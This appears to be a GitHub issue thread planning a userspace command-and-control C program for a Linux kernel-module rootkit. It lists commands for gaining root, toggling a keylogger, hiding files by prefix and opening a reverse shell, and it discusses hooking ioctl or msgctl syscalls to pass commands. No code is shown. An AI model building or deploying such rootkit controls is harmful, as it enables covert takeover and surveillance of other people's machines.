Write command & control userspace C file

[alichtman]

We now need a way to communicate with the rootkit that isn't writing to the param files, as those no longer exist.

A few options are:

$ kill <MAGIC_PID> $ cat <MAGIC_FILE>

The blocker is figuring out how to hook any of these commands.

ioctl maybe?

[alichtman]

Solution

Write a userspace C program that acts as a handler to interface with the rootkit LKM using ioctl.

During setup, this binary will need to be compiled and moved to /<ROOTKIT_NAME>.

$ /garden root will be the command to get root. $ /garden keylogger [enable/disable] will toggle keylogger $ /garden hide add PREFIX will add a prefix to the hide list $ /garden hide rm PREFIX will remove a prefix from the hide list $ /garden hide list will show prefixes in the hide list $ /garden rev_tcp IP PORT will open a reverse shell

[alichtman]

Need to add color!

[alichtman]

Hook a syscall that passes a pointer (for a pointer to the action_task struct), and has one other parameter we can use as a signal to the rootkit that the next call to this function is a command.

[alichtman]

Get msgctl working.

[alichtman]

35 closes this.